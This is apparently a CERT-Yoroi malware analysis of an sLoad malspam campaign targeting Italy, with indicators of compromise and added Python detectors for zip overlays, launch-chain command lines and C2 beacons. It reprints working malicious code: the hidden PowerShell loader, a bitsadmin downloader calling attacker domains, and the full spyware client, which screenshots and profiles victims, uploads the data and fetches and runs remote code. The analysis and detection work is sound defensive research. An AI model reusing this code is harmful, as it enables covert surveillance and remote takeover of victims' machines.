Summary: a new malspam campaign recently hit Italy, in which the threat actor is spreading a new variant of a powerful downloader named sLoad.
1. Introduction
Over the past few months, CERT-Yoroi has observed an emerging attack pattern: a series of malicious emails sharing common techniques, which may be linked to a single threat group's large-scale attacks against Italian networks. It is not yet clear whether these attempts come from an established cybercrime group that has modified its TTPs or from an entirely new actor, but CERT-Yoroi is tracking this threat under the internal codename "Sload-ITA" (TH-163). Last May, SANS ISC researchers documented similar operations in the UK. The malicious campaigns share the same drop mode, abusing a code-hiding technique based on compressed archives and similar drop-url patterns:
· 2018-10-08 – uses the "/AE-9455933DGW-nota-cliente" url pattern
· 2018-10-09 – uses the "/fattura-per-cliente-QN-OAYSAPV" url pattern
· 2018-10-15 – uses the "/MA-47462780Y3-documento-cliente" url pattern
· Some of the malicious emails were sent from "PEC" mailboxes
· 2018-11-19 – uses the "/documento-aggiornato-novembre-ER16909FP9" url pattern
· Tracked by CERT-PA
Yoroi-Cybaze ZLAB collected and analysed the samples recovered during the response operations in order to reveal the details of the malicious implant used by these attackers. The figure below summarises the steps of an sLoad infection.
Figure 1. sLoad infection flow
2. Technical Analysis
The analysed malicious sample is a compressed zip archive containing two different files:
1. A link that pretends to point to a system folder, named "invio fattura elettronica.lnk"
2. A hidden JPEG image, "image_20181119_100714_40.jpg", stored with the hidden (H) and archive (A) file attributes.
Although the LNK file extracted from the archive looks innocent on the surface, it is weaponised in a way similar to the one adopted by APT29 during its latest operations, suggesting that this technique is part of several malicious cyber-weapons. In fact, when the user double-clicks the file, a batch script spawns the following PowerShell script:
```powershell
C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"
```
The PS script searches for any file matching the pattern "documento-aggiornato-novembre-*.zip": if such a file exists, the script extracts a piece of code from its tail and invokes it through "IEX". We inspected the zip file and recovered this piece of code. In the figure below, the contents of the attached archive are shown in pink and yellow, and the foreign code in blue.
Figure 2. Code appended to the Zip archive
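The appended-code trick described above is easy to check for at the mail gateway or during triage, because a valid ZIP ends with its End Of Central Directory record (plus an optional comment whose length the record declares), so anything after that point is an overlay that no archiver will ever show. The following Python script is an added example written for this page, not code from Yoroi or from the samples: it builds a constructed archive with the two member names from the analysis, appends a harmless stand-in line in place of the real script, and reports the overlay together with the last line that the loader's `Get-Content ...[-1]` trick would hand to IEX. The member contents and the overlay text are constructed, and ZIP64 archives are out of scope.

```python
"""Check a ZIP attachment for data appended after the archive proper.

Added example for this write-up, not code from Yoroi or from the sLoad
samples: it builds a constructed archive in memory and looks for an
overlay after the End Of Central Directory (EOCD) record.
"""
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # End Of Central Directory signature
CD_SIG = b"PK\x01\x02"     # central directory file header signature
EOCD_LEN = 22              # fixed part of the EOCD record


def find_zip_overlay(data: bytes) -> dict:
    """Locate the real end of the archive and return whatever follows it.

    The EOCD is found by scanning backwards for its signature; each candidate
    is validated against the central directory offset and size it claims, so
    a stray 'PK\\x05\\x06' inside the overlay is not trusted. ZIP64 archives
    are not handled by this simplified check.
    """
    pos = len(data)
    while True:
        pos = data.rfind(EOCD_SIG, 0, pos)
        if pos == -1:
            raise ValueError("no valid End Of Central Directory record")
        if pos + EOCD_LEN > len(data):
            continue
        cd_size, cd_offset, comment_len = struct.unpack_from("<IIH", data, pos + 12)
        if cd_offset + cd_size == pos and data[cd_offset:cd_offset + 4] == CD_SIG:
            break
    archive_end = pos + EOCD_LEN + comment_len
    return {
        "archive_end": archive_end,
        "comment": data[pos + EOCD_LEN:archive_end],  # legitimate field, but also a hiding spot
        "overlay": data[archive_end:],                 # bytes no ZIP reader will ever look at
    }


def last_overlay_line(data: bytes) -> str:
    """The line the loader's `Get-Content ...[-1]` trick would feed to IEX ('' if clean)."""
    lines = find_zip_overlay(data)["overlay"].splitlines()
    return lines[-1].decode("latin-1") if lines else ""


def build_sample(overlay: bytes = b"") -> bytes:
    """Constructed stand-in for the attachment: two members, then optional trailing data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("invio fattura elettronica.lnk", b"L\x00\x00\x00 constructed-lnk-bytes")
        zf.writestr("image_20181119_100714_40.jpg", b"\xff\xd8\xff\xe0 constructed-jpeg-bytes")
    return buf.getvalue() + overlay


# Constructed overlay text standing in for the appended script (not the real one).
CONSTRUCTED_OVERLAY = b"\r\n# padding line\r\nWrite-Host 'constructed-overlay-line'"

if __name__ == "__main__":
    for label, blob in (("clean", build_sample()), ("appended", build_sample(CONSTRUCTED_OVERLAY))):
        info = find_zip_overlay(blob)
        print(f"{label}: archive ends at byte {info['archive_end']} of {len(blob)}, "
              f"overlay {len(info['overlay'])} bytes, last line {last_overlay_line(blob)!r}")
```

Reading the EOCD's declared comment length matters: a plain "file size minus EOCD position" check would wrongly flag every archive that carries a legitimate comment, while a script hidden in the comment field itself is returned separately here so it can be inspected too.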
This portion of the file contains the executable code invoked by the PowerShell script. Through calls to "bitsadmin.exe", this code downloads additional scripts from "firetechnicaladvisor.com" and stores all the newly downloaded files in the "%APPDATA%\<UUID>" folder. The figure below shows the contents of that folder after the malicious implant has been downloaded:
Figure 3. Components of the malicious implant
The following snippet shows the code responsible for downloading these malware components.
```powershell
$env_appData=$env:appdata;
$cmd='cmd';
$gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_});
$get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid;
$set_hidden='hidden';
$folder_to_store_file = $env_appData+'\'+$get_uuid;
$h=$folder_to_store_file+'\d';
if(!(test-path $folder_to_store_file)){ New-item -itemtype directory -Force -path $folder_to_store_file; };
$ps_to_download_and_execute='/c echo 1 > '+$h+' & bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
$e=1;
Start-Sleep -s 6;
$p2='powe';
while($e -eq 1){ if(test-path $h){ Start-Sleep -s 3 }else{ $e=2 } };
Start-Sleep -s 7;
$p1='ell';
$ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit';
start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
```
The NxPgKLnYEhMjXT.ps1 script installs the implant on the victim's machine and registers a scheduled task on the system to ensure the infection persists. The script then deletes itself.
Figure 4. Installation script of the malicious implant
After a quick look at the CxeLtfwc.ps1 script, we also noticed that the malware uses the "Invoke-Expression" cmdlet to load and run another piece of code from the "config.ini" file.
```powershell
param ([string]$k = "");
$random_name_of_powershell=Get-Process -name powershell*;
if ($random_name_of_powershell.length -lt 2){
    $folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
    $log = $env:APPDATA+"\"+$folder_name;
    $key=$k -split "," ;
    $Secure= Get-Content $log"\config.ini";
    $Encrypted= ConvertTo-SecureString $Secure -key $key;
    $encrypted_string = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
    $expression_to_execute = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($encrypted_string);
    Invoke-Expression $expression_to_execute;
}
```
The figure below shows how the other components of the malicious implant invoke this particular code: note that the script is launched with the input parameter "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16", which serves as the key to decrypt the contents of "config.ini", the malware's real payload.
```text
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden -ep bypass -File C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\CxeLtfwc.ps1 -k 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
--------------
"C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\<NOME_CASUALE>.vbs" 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
--------------
Dim objWmi, colItems, objItem, strUUID, blnValidUUID,oShell
Set objWmi = GetObject("winmgmts:\\" & "." & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
Set oShell = WScript.CreateObject ("WScript.Shell")
oShell.run "power"+"shel"+"l.exe -win hi"+"dden -ep by"+"pass -Fi"+"le C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\WpaejPkv.ps1 -k "& WScript.Arguments(0),0,True
Set oShell = Nothing
```
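The launch chain above (the LNK's hidden PowerShell with `-eP ByPass` and `iex`, the bitsadmin download into `%APPDATA%\<UUID>` from the downloader snippet, and the VBS that splices `"power"+"shel"+"l.exe"` back together) leaves a recognisable footprint in process-creation and script-block logs. The Python triage below is an added example for this write-up, not Yoroi's tooling: it undoes the quote splicing before matching and then scores each line against indicators taken from the snippets above. The log lines are constructed to resemble such events (three benign ones included), the rule names and the two-indicator threshold are my own choices, and the path under AppData\Roaming reuses the UUID shown in the invocation above.

```python
"""Triage process command lines and script fragments for the sLoad launch chain.

Added example, not Yoroi's code. The indicators (hidden window, execution policy
bypass, IEX, BITS downloads, scripts under %APPDATA%\\<GUID>, and "hi"+"dden"
style string splicing) come from the launch chain in the analysis; the log lines
are constructed to resemble process-creation / script-block events.
"""
import re

SPLICE_RE = re.compile(r"""["']\s*\+\s*["']""")  # "power"+"shel"+"l"  ->  "powershell"

# (name, pattern, match_on_raw). Most rules run on a normalised copy of the text
# (splices joined, quotes stripped, lower-cased) so that hi"d"den reads hidden;
# the two obfuscation rules run on the raw text because the quotes are the evidence.
RULES = [
    ("hidden_window",          r"-w(?:in|indowstyle)?\s+hidden", False),
    ("execution_bypass",       r"-e(?:p|xec|xecutionpolicy)?\s+bypass", False),
    ("iex_invoke",             r"\biex\b|invoke-expression", False),
    ("download_cradle",        r"downloadstring|downloadfile|net\.webclient", False),
    ("bitsadmin_download",     r"bitsadmin\b.*?/transfer\b.*?https?://", False),
    ("script_in_appdata_guid", r"appdata\\roaming\\[0-9a-f-]{36}\\[^\s\\]+\.(?:ps1|vbs)", False),
    ("quote_split_token",      r'\w"\w+"\w', True),        # hi"d"den
    ("string_splice",          SPLICE_RE.pattern, True),   # "by"+"pass"
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), raw) for name, pat, raw in RULES]


def normalise(text: str) -> str:
    """Undo the cheap obfuscations before matching."""
    joined = SPLICE_RE.sub("", text)
    return joined.replace('"', "").replace("'", "").lower()


def detect(text: str) -> list:
    """Names of the rules that fire on one command line or script fragment."""
    norm = normalise(text)
    return [name for name, rx, raw in COMPILED if rx.search(text if raw else norm)]


def is_suspicious(text: str) -> bool:
    """A single indicator (a plain BITS download) is common in a fleet; require two."""
    return len(detect(text)) >= 2


# Constructed log lines modelled on the launch chain (not real telemetry).
SAMPLES = [
    # LNK-spawned loader: split token hi"d"den, -eP ByPass, tail of the zip piped to iex
    r'C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"',
    # downloader stage: BITS job writing the next script into %APPDATA%\<UUID>
    r'cmd /c bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\NxPgKLnYEhMjXT.ps1 & exit',
    # decryption stage launched with the 1..16 key
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden -ep bypass -File C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\CxeLtfwc.ps1 -k 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16',
    # VBS launcher body as it would appear in script content, with spliced strings
    r'oShell.run "power"+"shel"+"l.exe -win hi"+"dden -ep by"+"pass -Fi"+"le C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\WpaejPkv.ps1 -k "& WScript.Arguments(0),0,True',
    # benign admin activity
    r'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\Rotate-Logs.ps1',
    r'bitsadmin /transfer wsusjob /download /priority normal https://wsus.corp.example/updates/kb.msu C:\Windows\Temp\kb.msu',
    r'"C:\Program Files\Git\cmd\git.exe" pull',
]

if __name__ == "__main__":
    for text in SAMPLES:
        print("SUSPECT" if is_suspicious(text) else "ok     ", detect(text), text[:70])
```

Matching after normalisation is what makes the VBS line score on `hidden_window` and `execution_bypass` even though the raw text only contains `hi"+"dden` and `by"+"pass`; the raw-text rules then add the splicing itself as a separate indicator.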
Both the "config.ini" and "web.ini" files are decrypted and invoked at runtime through the following set of system commands:
```powershell
ConvertTo-SecureString
[System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
```
The figure below shows a portion of the encrypted code in the "config.ini" file, followed by its decrypted form.
Figure 5. Encrypted payload in "config.ini"
This is the source code of the malicious client:
```powershell
$runDMC = "cmd";
$key=@(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16)
$morty=$env:APPDATA;
function Get-ScreenCapture{
    Param(
        [Parameter()] [Alias("Path")] [string]$Directory = ".",
        [Parameter()] [ValidateRange(70,100)] [int]$Quality,
        [Parameter()] [Switch]$AllScreens
    )
    Set-StrictMode -Version 2
    Add-Type -AssemblyName System.Windows.Forms
    if ($AllScreens){ $Capture = [System.Windows.Forms.Screen]::AllScreens }else{ $Capture = [System.Windows.Forms.Screen]::PrimaryScreen }
    foreach ($C in $Capture){
        $screenCapturePathBase = $path+"\ScreenCapture"
        $cc = 0
        while (Test-Path "${screenCapturePathBase}${cc}.jpg") { $cc++ }
        $FileName="${screenCapturePathBase}${cc}.jpg"
        $Bitmap = New-Object System.Drawing.Bitmap($C.Bounds.Width, $C.Bounds.Height)
        $G = [System.Drawing.Graphics]::FromImage($Bitmap)
        $G.CopyFromScreen($C.Bounds.Location, (New-Object System.Drawing.Point(0,0)), $C.Bounds.Size)
        $g.Dispose()
        $Quality=70;
        $EncoderParam = [System.Drawing.Imaging.Encoder]::Quality
        $EncoderParamSet = New-Object System.Drawing.Imaging.EncoderParameters(1)
        $EncoderParamSet.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($EncoderParam, $Quality)
        $JPGCodec = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where{$_.MimeType -eq 'image/jpeg'}
        $Bitmap.Save($FileName ,$JPGCodec, $EncoderParamSet)
    }
}
$productID = (Get-WmiObject Win32_ComputerSystemProduct).UUID ;
$path = $morty+"\"+$productID;
$btlog=$path+'\btc.log'
$pp=$path+'\'+$productID;
try{ If(test-path $pp"_0"){ Remove-Item $pp"_*";}}catch{}
try{ If(test-path $pp){Remove-Item $pp;}}catch{}
$ldf='/C bitsadmin /reset';
start-process -wiNdowStylE HiDden $runDMC $ldf;
$Secure= Get-Content $path"\web.ini";
$Encrypted= ConvertTo-SecureString $Secure -key $key;
$slStr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted);
$rStr = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
$d=$rStr -split ","
For ($i=0; $i -le $d.Length-1; $i++){
    if ($d[$i] -match "http"){
        $rp= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
        $ldf='/C bitsadmin /transfer '+$rp+' /download /priority normal "'+$d[$i]+'/captcha.php?ch=1" '+$path+'\'+$productID+'_'+$i;
        start-process -wiNdowStylE HiDden $runDMC $ldf;
    }
}
$e=1;$dd=0;
while($e -eq 1){
    $ad=2;
    For ($i=0; $i -le $d.Length-1; $i++){
        $pp=$path+'\'+$productID+'_'+$i;
        if([System.IO.File]::Exists($pp)){
            $line=Get-Content $pp
            if ($line -eq "sok"){ $did=$i;}
            $ad=1;
        }
    }
    $dd++;
    if ($dd -gt 60) {
        $outU="";
        For ($i=0; $i -le $d.Length-1; $i++){
            if ($d[$i] -match "http"){
                $l=$d[$i].split(".")[0] -replace "[^0-9]" , '';
                $p=$d[$i].split(".")[1] -replace "[^A-Z/]" , '';
                $n=[int]$l+1;
                $r1=$l+'.'+$p;
                if ($n -gt 50){ $n=1;}
                $r2=[string]$n+'.'+$p;
                $outU+=$d[$i]+"," -replace $r1, $r2
            }
        }
        $Secure = ConvertTo-SecureString $outU -AsPlainText -Force
        $Encrypted = ConvertFrom-SecureString -SecureString $Secure -key $key
        $Encrypted | out-file $path"\web.ini";
        stop-process -name powershell*
    }
    if ($ad -eq 1){ $e=2;}
    Start-Sleep -s 3
}
$rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_})
$ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'new/u.jpg" "'+$path+'\web.ini" & exit ';
$ldf | out-file $path'\asd'
start-process -wiNdowStylE HiDden $runDMC $ldf;
$outD="";
$dd=Get-WmiObject -Class Win32_LogicalDisk | Where-Object {$_.Description -match 'Network'} | Select-Object ProviderName,DeviceID;
try{ if ($dd ){for ($i=0; $i -le $dd.length; $i++){$outD=$outD+'{'+$dd[$i].DeviceID+''+$dd[$i].ProviderName+'}';}} }catch {}
try{ if ($dd -and $outD -eq "" ){$outD='{'+$dd[$i].DeviceID+''+$dd.ProviderName+'}';}}catch {}
try{
    $nw=$path+'\_nw'; $nr=$path+'\_nr';
    $rf='/C net view > '+$nw+' & copy '+$nw+' '+$nr+' & exit';
    start-process -wiNdowStylE HiDden cmd $rf;
    $e=1;while($e -eq 1){If(test-path $nr){$e=3;}Start-Sleep -s 3;}
    $l=get-content $nr;
    $gk=$l -match '\\';
    if ($gk -and $gk.length -gt 1){ $outD=$outD+'{in network:'+$gk.length+'}'; }
    remove-item $nr
}catch{}
$cp=Get-WmiObject win32_processor | select Name;
try{ if ($cp.length -gt 0){ $cpu=$cp[0].Name }else{$cpu=$cp.Name} }catch {}
try{$v1=(gwmi win32_operatingsystem).caption }catch {}
try{ Remove-Item $path"\*.jpg";}catch{}
try{
    if([System.IO.File]::Exists($path+"\f.ini")){
        $ci=Get-Content $path"\f.ini";
    }else{
        $ci=0;
        for ($i=0;$i -le 3;$i++){ Get-ScreenCapture; Start-Sleep -s 40; }
        $cit=Get-ChildItem -Path c:\users -Filter *.ICA -Recurse -ErrorAction SilentlyContinue -Force
        if ($cit){ $ci=1; }
        $ci | Out-File $path"\f.ini"
    }
}catch{}
if (test-path $path"\..\Microsoft\Outlook\"){$ot=1;}else{$ot=0;}
try {$lnk=([System.Uri]$d[$did]).Host}catch{}
$s=0;
while($true){
    $out="";
    $tt=Get-Process | Select-Object name
    for ($i=0; $i -le $tt.length-1; $i++){ $out=$out+"*"+$tt[$i].Name; }
    $rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_})
    $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'captcha.php?lnk='+$lnk+'&s='+$s+'&g=pu&c='+$ci+'&id='+$productID+'&v='+$v1+'&c='+$rp+'&a='+$out+'&d='+$outD+'&n='+$env:ComputerName+'&cpu='+$cpu+'&o='+$ot+'" '+$path+'\'+$productID+' > '+$btlog+' & exit ';
    start-process -wiNdowStylE HiDden $runDMC $ldf;
    Start-Sleep -s 120;
    $pp=$path+'\'+$productID;
    if([System.IO.File]::Exists($pp)){
        $line=Get-Content $pp;
        if ($line -match "run="){
            $u=$line -replace 'run=','';
            $ldf="/C powershell.exe -command iex ((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('"+$u+"')))";
            start-process -wiNdowStylE HiDden $runDMC $ldf;
        }elseif ($line.length -gt 3){
            try{ Remove-Item $path"\*.jpg";}catch{}
            $dPath = [Environment]::GetFolderPath("MyDocuments")
            $rp= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_})
            $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$path+'\'+$productID+'_'+$rp+'.txt & Copy /Z '+$path+'\'+$productID+'_'+$rp+'.txt '+$path+'\'+$productID+'_'+$rp+'_1.txt & certutil -decode '+$path+'\'+$productID+'_'+$rp+'_1.txt '+$dPath+'\'+$productID+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$productID+'_'+$rp+'.exe" & bitsadmin /transfer '+$rp+'s /download /priority normal "'+$d[$did]+'gate.php?n='+$env:ComputerName+'&ts=1&id='+$productID+'&c='+$rp+'" '+$path+'\'+$productID+'_'+$rp+'.txt & exit';
            start-process -wiNdowStylE HiDden $runDMC $ldf;
            for ($i=0;$i -le 5;$i++){ Get-ScreenCapture; Start-Sleep -s 40; }
            $ldf='/C del '+$path+'\'+$productID+'_'+$rp+'.txt & del '+$path+'\'+$productID+'_'+$rp+'_1.txt & del '+$dPath+'\'+$productID+'_'+$rp+'.exe & exit';
            start-process -wiNdowStylE HiDden $runDMC $ldf;
        }
    }
    for ($i=0; $i -le 5; $i++){
        $scr=$path+"\ScreenCapture"+$i+".jpg"
        if([System.IO.File]::Exists($scr)){
            $rur= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});
            $rf='/C bitsadmin /transfer '+$rur+' /upload /priority FOREGROUND "'+$d[$did]+'p.php?n='+$env:ComputerName+'&id='+$productID+'&i='+$i+'&s='+$rur+'" "'+$scr+'" & del "'+$scr+'" & exit';
            start-process -wiNdowStylE HiDden $runDMC $rf;
        }
    }
    if([System.IO.File]::Exists($btlog)){
        $e=0;
        foreach($line in Get-Content $btlog -Encoding UTF8) { if ($line -match "ERROR"){ $e++; } }
        if ($e -gt 0 ){
            $rf='/C bitsadmin /reset & exit';
            start-process -wiNdowStylE HiDden $runDMC $rf;
            stop-process -name powershell*
        }
    }
    Start-Sleep -s 1200;
    $s++;
}
```
Decrypting the contents of "web.ini" reveals the remote addresses of the C2 used by the malicious implant: https://hamofgri.me/images/, https://ljfumm.me/images/
The malicious client collects information about the victim's machine, such as: domain, DNS cache, running processes, IP and system architecture. It also periodically captures screenshots of the victim's current desktop, searches for the Microsoft Outlook folder, and records whether any "*.ICA" Citrix files exist under the user directories. All this information is sent to the command and control server. After submitting the data, it receives further PowerShell code directly from the attacker. This behaviour is characteristic of trojan/spyware malware, typically used as a beachhead from which to re-establish control of the infected host, or even as the initial stage of a more sophisticated attack.
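The client's check-in, as decrypted above, packs the host profile into the query string of `captcha.php` (the machine UUID in `id`, the OS caption in `v`, a `*`-joined process list in `a`, network shares in `d`, the Citrix and Outlook flags in `c` and `o`) and uploads screenshots to `p.php`; that shape is visible in proxy logs even when the C2 domain is new. The Python below is an added example, not Yoroi's code: it parses constructed proxy records (the host `c2.example.test` stands in for the real C2 domains, and the UUID is the one from the invocation shown earlier) and flags URLs that combine two or more of those traits, while showing that the bare `captcha.php?ch=1` probe or a legitimate CAPTCHA endpoint does not cross the threshold on its own.

```python
"""Flag sLoad-style check-in URLs in web proxy logs.

Added example, not Yoroi's code. The beacon shape (captcha.php / gate.php /
p.php, a machine UUID in `id`, host facts packed into the query string and a
'*'-joined process list in `a`) comes from the decrypted client in the
analysis; the hosts and log lines below are constructed, not the real C2.
"""
import re
from urllib.parse import parse_qs, urlsplit

UUID_RE = re.compile(r"^[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}$", re.IGNORECASE)
BEACON_SCRIPTS = ("captcha.php", "gate.php", "p.php")
# Query keys the client fills in: lnk, s, g, c, id, v, a, d, n, cpu, o (ts on gate.php).
TELEMETRY_KEYS = {"lnk", "s", "g", "c", "id", "v", "a", "d", "n", "cpu", "o", "ts"}


def inspect_url(url: str) -> list:
    """Reasons a URL looks like an sLoad check-in (empty list if none)."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)   # keep_blank so 'd=' still counts
    reasons = []
    if parts.path.rsplit("/", 1)[-1] in BEACON_SCRIPTS and qs:
        reasons.append("beacon_script_name")
    if any(UUID_RE.match(v) for v in qs.get("id", [])):
        reasons.append("machine_uuid_in_query")
    if len(TELEMETRY_KEYS & set(qs)) >= 6:
        reasons.append("host_profile_in_query")
    if any(v.count("*") >= 3 for v in qs.get("a", [])):
        reasons.append("process_list_in_query")
    return reasons


def parse_proxy_line(line: str) -> dict:
    """Constructed record format: <timestamp> <client-ip> <method> <url> <status>."""
    ts, client, method, url, status = line.split()
    return {"ts": ts, "client": client, "method": method, "url": url, "status": int(status)}


def triage(lines) -> list:
    """(client, url, reasons) for every record with at least two reasons."""
    hits = []
    for line in lines:
        rec = parse_proxy_line(line)
        reasons = inspect_url(rec["url"])
        if len(reasons) >= 2:
            hits.append((rec["client"], rec["url"], reasons))
    return hits


# Constructed proxy records; c2.example.test stands in for the real C2 hosts.
PROXY_LOG = [
    # initial reachability probe: only the script name matches
    "2018-11-21T10:14:02Z 10.0.0.5 GET https://c2.example.test/images/captcha.php?ch=1 200",
    # full check-in carrying the host profile
    "2018-11-21T10:16:08Z 10.0.0.5 GET https://c2.example.test/images/captcha.php?lnk=c2.example.test&s=0&g=pu&c=0&id=42082A54-EE38-CA41-8C45-A16336FBCCD9&v=Microsoft%20Windows%2010%20Pro&c=AbCdEfGhIjKl&a=*System*explorer*OUTLOOK*powershell&d=&n=WS-ADMIN&cpu=Intel&o=1 200",
    # screenshot upload
    "2018-11-21T10:19:30Z 10.0.0.5 POST https://c2.example.test/images/p.php?n=WS-ADMIN&id=42082A54-EE38-CA41-8C45-A16336FBCCD9&i=0&s=QwErTyUiOpAsDfGh 200",
    # benign: a real CAPTCHA endpoint and a web-analytics hit with many parameters
    "2018-11-21T10:20:00Z 10.0.0.7 GET https://www.example.test/login/captcha.php?token=8f3a 200",
    "2018-11-21T10:20:05Z 10.0.0.7 GET https://analytics.example.test/collect?v=1&tid=UA-1&cid=555&t=pageview&dl=https%3A%2F%2Fexample.test%2F 200",
]

if __name__ == "__main__":
    for client, url, reasons in triage(PROXY_LOG):
        print(client, reasons, url[:80])
```

Keying on the query-string shape rather than the domain is what lets the same rule survive the web.ini rotation logic in the client, which rewrites the C2 host list after repeated failures.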
Figure 6. VT scores for the sLoad malicious components
3. Conclusion
The recent sLoad attack waves, reported by third-party security firms and government CERTs, pose a major threat to Italian networks, because the attackers have prepared well-crafted phishing email themes and the techniques and methods used by the malware implant have a low detection rate.
It is not yet clear whether the group behind these attacks is a newcomer to cybercrime. The first malicious campaigns were spotted in May 2018 and targeted UK users, while the recent campaigns against Italian users began last October, indicating an expansion of the group's malicious activity.
CERT-Yoroi is currently tracking TH-163 in the Italian region, and the ZLAB team continuously analyses its components, malware implants and techniques to ensure the protection of our country.
IoC
Malicious URLs:
· https://upabovenewyork[.com/.fatturazione/fattura-per-cliente-QN-OAYSAPV
· https://sciencefictionforgirls.[com/cience/ionfo
· upabovenewyork[.com
· 91.218.127.[180
· sciencefictionforgirls[.com
· 185.17.27[.100
· https://rootcellarproductions.[com/documento/AE-9455933DGW-nota-cliente
· https://peatsenglishcider.[com/seng/ishci
· rootcellarproductions[.com
· 91.218.127.[183
· peatsenglishcider.[com
· 185.17.27[.100
· https://three-bottles[.com/area-riservata/MA-47462780Y3-documento-cliente
· https://icodeucode.[com/col/euco
· three-bottles[.com
· 91.218.127.[183
· firetechnicaladvisor.[com
· 185.17.27.[108
· https://cavintageclothing[.com/update/b746yrthdfb.txt
· cavintageclothing.[com
· 185.17.27[.108
· bureaucratica[.org
· 18.13.7[.20
C2 (sload):
· https://balkher.[eu/doc/p2.txt
· https://balkher.[eu/sload/2.0/hostp1.txt
· https://balkher[.eu/sload//img.php?ch=1
· balkher[.eu
· 185.197.75[.241
· https://perecwarrio[.eu/sload/
· perecwarrior[.eu
· 185.211.246[.50
· https://ljfumm[.me/images/gate.php
· https://hamofgri.[me/images/gate.php
· https://hamofgri.[me/images/captcha.php?ch=1
· https://ljfumm[.me/images/captcha.php?ch=1
· ljfumm[.me
· hamofgri[.me
· 185.197.75[.10
Persistence:
· %APPDATA%\<GUID>
Hashes:
· b702e8e23165273f8e90615ce4af2f158048bf6b615f545b992fbbb62f7eff27 zip
· 1cbe16ac066aeac78c2f3e41e2afa3433833bf6f65131bcfbf88db97e9b94efb jpg
· d8f4ae0477f7e2931e89e4b6d3e78556d3b5765a2c08bc3bdec8c1f6dc0904c0 lnk
· ed1007884730a664f9cc827fb60924079149a2fec08ca91c2342c368e727c330 zip
· 3b5b6cd6ecef252624ee3b5c80d27647766527920b76ebc533f9bc336bfe91ad jpg
· 0a392ded18578069c647383492253f990210b9c9f9293a6ded09eab7e0936562 jpg
· b19794f283f9c09f997cbfcbec8c30a5e48eb520ee7bcabd0d62c7b527105f42 lnk
· 3866a58fe3d459173a28bfdee3ec7a90d7551761121fba9eda3685a268cdeda5 ps1
· ed99528a9e818fb486e468d9744745fcfd7157cc8e18181dce7404483c12e834 zip
· 97f9bb29083458c88844a2cecca272a22cac8cf7960b76c3fa46e891eeb18236 lnk
· 444e29050bbe68484e33f4e30dbe165186f93884e3336643cfb965156141c5ae jpg
· 6a49ed883ed266682ec275a395e0d7c6489ded6a6d7072e84af696e82f3b49a3 ps1
· f94ebce29158af5f4df34e5af428a514faeef20de08418ad0153ad2a9a07cea0 ps1
· daadae8672c31474047f21008ec131cf6a102dac7ca8b8c6df89d35bdf2246da vbs
